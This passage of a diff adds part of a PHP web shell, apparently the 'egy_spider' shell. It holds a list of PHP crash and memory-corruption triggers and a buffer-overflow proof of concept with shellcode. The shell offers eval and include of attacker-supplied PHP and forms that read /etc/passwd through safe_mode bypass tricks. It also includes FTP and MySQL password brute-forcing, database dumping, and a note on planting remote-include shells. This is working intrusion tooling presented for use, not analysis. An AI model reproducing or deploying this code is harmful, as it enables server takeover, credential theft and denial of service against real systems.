+ $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
+ break;
+ case 'dos11':
+ @array_fill(1,123456789,"Infigo-IS");
+ break;
+ case 'dos12':
+ @substr_compare("A","A",12345678);
+ break;
+ case 'dos13':
+ @unserialize("a:2147483649:{");
+ break;
+ case 'dos14':
+ $Data = @str_ireplace("\n", "<br>", $Data);
+ break;
+ case 'dos15':
+ function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}
+ $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}
+ @htmlentities($str1, ENT_NOQUOTES, "UTF-8");
+ break;
+ case 'dos16':
+ $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);
+ for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
+ unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);
+ break;
+ case 'dos17':
+ $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"; 
+ $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"; 
+ $x = "AQ                                                                        "; 
+ unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
+ break;
+ case 'dos18':
+ $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600); 
+ if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) 
+ echo "Msg not sent because $msg_err\n"; 
+ if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) { 
+ echo "$msg\n"; 
+ } else { echo "Received $msg_error fetching message\n"; break; } 
+ @msg_remove_queue ($msg_id);
+ break;
+ case 'dos19':
+ $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");
+ break;
+ case 'dos20':
+ $hashtable = str_repeat("A", 39);
+ $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
+ $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
+ $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
+ for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }
+ $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
+ @unserialize($str);
+ break;
+ case 'dos21':
+ imagecreatetruecolor(1234,1073741824);
+ break;
+ case 'dos22':
+ imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120);
+ break;
+ case 'dos23':
+ $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b);
+ break;
+ case 'dos24':
+ setlocale(LC_COLLATE, str_repeat("A", 34438013));
+ break;
+ case 'dos25':
+ glob(str_repeat("A", 9638013));
+ break;
+ case 'dos26':
+ glob("a",-1);
+ break;
+ case 'dos27':
+ fnmatch("*[1]e", str_repeat("A", 9638013));
+ break;
+ case 'dos28':
+ if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";}
+ break;
+ case 'dos29':
+ if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');}
+ break;
+ case 'dos30':
+ $a=str_repeat("A", 65535);  $b=1;  $c=str_repeat("A", 65535);  chunk_split($a,$b,$c);
+ break;
+ case 'dos31':
+ if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );}
+ break;
+ case 'dos32':
+ if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . $eip_unicode );}
+ break;
+ case 'dos33':
+ $buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP);
+ break;
+ case 'dos34':
+ if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);}
+ break;
+ case 'dos35':
+ $a = str_repeat("/", 4199000); iconv(1, $a, 1);
+ break;
+ case 'dos36':
+ $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a);
+ break;
+ case 'dos37':
+ $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a);
+ break;
+  case 'dos39':
+ sprintf("[%'A2147483646s]\n", "A");
+ break;
+  break;
+  case 'dos40':
+// PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow
+// poc exploit (and safe_mode bypass)
+// windows 2000 sp3 en / seh overwrite
+// by rgod
+// site: http://egyspider.eu
+
+
+// u can easily adjust for php5
+// this as my little contribute to MOPB
+
+
+$____scode=
+"\xeb\x1b".
+"\x5b".
+"\x31\xc0".
+"\x50".
+"\x31\xc0".
+"\x88\x43\x59".
+"\x53".
+"\xbb\xca\x73\xe9\x77". //WinExec
+"\xff\xd3".
+"\x31\xc0".
+"\x50".
+"\xbb\x5c\xcf\xe9\x77". //ExitProcess
+"\xff\xd3".
+"\xe8\xe0\xff\xff\xff".
+"\x63\x6d\x64".
+"\x2e".
+"\x65".
+"\x78\x65".
+"\x20\x2f".
+"\x63\x20".
+"start notepad & ";
+
+
+   $eip="\xdc\xf5\x12";
+   $____suntzu=str_repeat("\x90",100);
+   $____suntzu.=$____scode;
+   $____suntzu.=str_repeat("a",2460 - strlen($____scode));
+   $____suntzu.=$eip;
+ break;
+ case 'zend':
+ if(empty($_POST['zend'])){
+} else {
+
+
+$dezend=$_POST['zend'];
+include($_POST['zend']);
+print_r($GLOBALS);
+require_once("$dezend");
+echo "</textarea></p>";
+}
+break;
+ case 'dos38':
+ $a = str_repeat("/", 9791999); iconv_strlen(1, $a);
+ break;
+}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+
+
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ if($_POST['brute_method']=='passwd'){
+ foreach($users as $user)
+  {
+    $connection = @ftp_connect($ftp_server,$ftp_port,10);
+    if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+    else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } 
+    @ftp_close($connection);
+  }
+ }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){
+  foreach($users as $user)
+  {
+    $connection = @ftp_connect($ftp_server,$ftp_port,10);
+    if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }
+    @ftp_close($connection);
+  }
+ }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+
+
+if ($_POST['cmd']=="db_brute")
+ {
+ $suc = 0;
+ if($_POST['brute_method']=='passwd'){
+ foreach($users as $user)
+  {
+   $sql = new my_sql();
+   $sql->db   = $_POST['db'];
+   $sql->host = $_POST['db_server'];
+   $sql->port = $_POST['db_port'];
+   $sql->user = $user;
+   $sql->pass = $user;
+   if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  }
+ if(isset($_POST['reverse']))
+  {
+   foreach($users as $user)
+    {
+     $sql = new my_sql();
+     $sql->db   = $_POST['db'];
+     $sql->host = $_POST['db_server'];
+     $sql->port = $_POST['db_port'];
+     $sql->user = $user;
+     $sql->pass = strrev($user);
+     if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }
+    }
+  }
+ }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){
+  foreach($users as $user)
+  {
+   $sql = new my_sql();
+   $sql->db   = $_POST['db'];
+   $sql->host = $_POST['db_server'];
+   $sql->port = $_POST['db_port'];
+   $sql->user = $_POST['mysql_l'];
+   $sql->pass = $user;
+   if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }
+  }
+ }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+
+
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} } 
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ } 
+
+
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+
+
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ { 
+ if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">'; 
+ $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38','id39');
+ if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">'; 
+ return '<div id="'.$id.'">';
+ }
+ 
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text210'],'id20').$table_up2.div('id20').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','zend',85,(!empty($_POST['zend'])?($_POST['zend']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'zend').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+if($unix && @function_exists('touch')){
+echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($_SERVER["SCRIPT_FILENAME"])))
+.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"
+.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
+echo sr(15,"<b> or set  Day".$arrow."</b>",
+'
+<select name="day" size="1">
+<option value="01">1</option>
+<option value="02">2</option>
+<option value="03">3</option>
+<option value="04">4</option>
+<option value="05">5</option>
+<option value="06">6</option>
+<option value="07">7</option>
+<option value="08">8</option>
+<option value="09">9</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+<option value="25">25</option>
+<option value="26">26</option>
+<option value="27">27</option>
+<option value="28">28</option>
+<option value="29">29</option>
+<option value="30">30</option>
+<option value="31">31</option>
+</select>'
+.ws(4)."<b>Month".$arrow."</b>"
+.'
+<select name="month" size="1">
+<option value="January">January</option>
+<option value="February">February</option>
+<option value="March">March</option>
+<option value="April">April</option>
+<option value="May">May</option>
+<option value="June">June</option>
+<option value="July">July</option>
+<option value="August">August</option>
+<option value="September">September</option>
+<option value="October">October</option>
+<option value="November">November</option>
+<option value="December">December</option>
+</select>'
+.ws(4)."<b>Year".$arrow."</b>"
+.'
+<select name="year" size="1">
+<option value="1998">1998</option>
+<option value="1999">1999</option>
+<option value="2000">2000</option>
+<option value="2001">2001</option>
+<option value="2002">2002</option>
+<option value="2003">2003</option>
+<option value="2004">2004</option>
+<option value="2005">2005</option>
+<option value="2006">2006</option>
+<option value="2006">2007</option>
+<option value="2006">2008</option>
+<option value="2006">2009</option>
+<option value="2006">2010</option>
+</select>'
+.ws(4)."<b>Hour".$arrow."</b>"
+.'
+<select name="chasi" size="1">
+<option value="01">01</option>
+<option value="02">02</option>
+<option value="03">03</option>
+<option value="04">04</option>
+<option value="05">05</option>
+<option value="06">06</option>
+<option value="07">07</option>
+<option value="08">08</option>
+<option value="09">09</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+</select>'
+.ws(4)."<b>Minute".$arrow."</b>"
+.'
+<select name="minutes" size="1">
+<option value="01">1</option>
+<option value="02">2</option>
+<option value="03">3</option>
+<option value="04">4</option>
+<option value="05">5</option>
+<option value="06">6</option>
+<option value="07">7</option>
+<option value="08">8</option>
+<option value="09">9</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+<option value="25">25</option>
+<option value="26">26</option>
+<option value="27">27</option>
+<option value="28">28</option>
+<option value="29">29</option>
+<option value="30">30</option>
+<option value="31">31</option>
+<option value="32">32</option>
+<option value="33">33</option>
+<option value="34">34</option>
+<option value="35">35</option>
+<option value="36">36</option>
+<option value="37">37</option>
+<option value="38">38</option>
+<option value="39">39</option>
+<option value="40">40</option>
+<option value="41">41</option>
+<option value="42">42</option>
+<option value="43">43</option>
+<option value="44">44</option>
+<option value="45">45</option>
+<option value="46">46</option>
+<option value="47">47</option>
+<option value="48">48</option>
+<option value="49">49</option>
+<option value="50">50</option>
+<option value="51">51</option>
+<option value="52">52</option>
+<option value="53">53</option>
+<option value="54">54</option>
+<option value="55">55</option>
+<option value="56">56</option>
+<option value="57">57</option>
+<option value="58">58</option>
+<option value="59">59</option>
+</select>'
+.ws(4)."<b>Second".$arrow."</b>"
+.'
+<select name="second" size="1">
+<option value="01">1</option>
+<option value="02">2</option>
+<option value="03">3</option>
+<option value="04">4</option>
+<option value="05">5</option>
+<option value="06">6</option>
+<option value="07">7</option>
+<option value="08">8</option>
+<option value="09">9</option>
+<option value="10">10</option>
+<option value="11">11</option>
+<option value="12">12</option>
+<option value="13">13</option>
+<option value="14">14</option>
+<option value="15">15</option>
+<option value="16">16</option>
+<option value="17">17</option>
+<option value="18">18</option>
+<option value="19">19</option>
+<option value="20">20</option>
+<option value="21">21</option>
+<option value="22">22</option>
+<option value="23">23</option>
+<option value="24">24</option>
+<option value="25">25</option>
+<option value="26">26</option>
+<option value="27">27</option>
+<option value="28">28</option>
+<option value="29">29</option>
+<option value="30">30</option>
+<option value="31">31</option>
+<option value="32">32</option>
+<option value="33">33</option>
+<option value="34">34</option>
+<option value="35">35</option>
+<option value="36">36</option>
+<option value="37">37</option>
+<option value="38">38</option>
+<option value="39">39</option>
+<option value="40">40</option>
+<option value="41">41</option>
+<option value="42">42</option>
+<option value="43">43</option>
+<option value="44">44</option>
+<option value="45">45</option>
+<option value="46">46</option>
+<option value="47">47</option>
+<option value="48">48</option>
+<option value="49">49</option>
+<option value="50">50</option>
+<option value="51">51</option>
+<option value="52">52</option>
+<option value="53">53</option>
+<option value="54">54</option>
+<option value="55">55</option>
+<option value="56">56</option>
+<option value="57">57</option>
+<option value="58">58</option>
+<option value="59">59</option>
+</select>'
+.in('hidden','cmd',0,'touch')
+.in('hidden','dir',0,$dir)
+.ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+$select='';
+if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}
+if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}
+if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}
+if($unix && $select){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
+echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($_SERVER["SCRIPT_FILENAME"]))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+if(!$safe_mode){
+$aliases2 = '';
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id5555').$table_up2.div('id5555').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id50').$table_up2.div('id50').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id800').$table_up2.$font;
+echo "<div align=center>".div('id800')."<textarea name=php_eval cols=100 rows=10>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"egy_spider.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id520').$table_up2.div('id520').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id500').$table_up2.div('id500').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id510').$table_up2.div('id510').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id800').$table_up2.div('id800').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text220'],'id900').$table_up2.div('id900').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','sym1p2',50,(!empty($_POST['sym1p2'])?($_POST['sym1p']):("/../../../"))).in('text','sym1p',50,(!empty($_POST['sym1p'])?($_POST['sym1p']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text222'],'id980').$table_up2.div('id980').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text205'].$arrow."</b>",in('text','log',96,(!empty($_POST['log'])?($_POST['log']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'Paralyzing been planted and you can usefilename.php?ss=http://shell.txt?').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id801').$table_up2.div('id801').$ts;
+echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id5505').$table_up2.div('id5505').$ts;
+echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text151'],'id1221').$table_up2.div('id1221').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test_5_2_6',85,(!empty($_POST['test_5_2_6'])?($_POST['test_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text161'],'id12211').$table_up2.div('id12211').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_5_2_6',85,(!empty($_POST['test2_5_2_6'])?($_POST['test2_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+
+
+
+
+
+
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text162'],'id9820').$table_up2.div('id9820').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text163'],'id9820').$table_up2.div('id9820').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_perl').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text144'],'id40').$table_up2.div('id40').$ts;
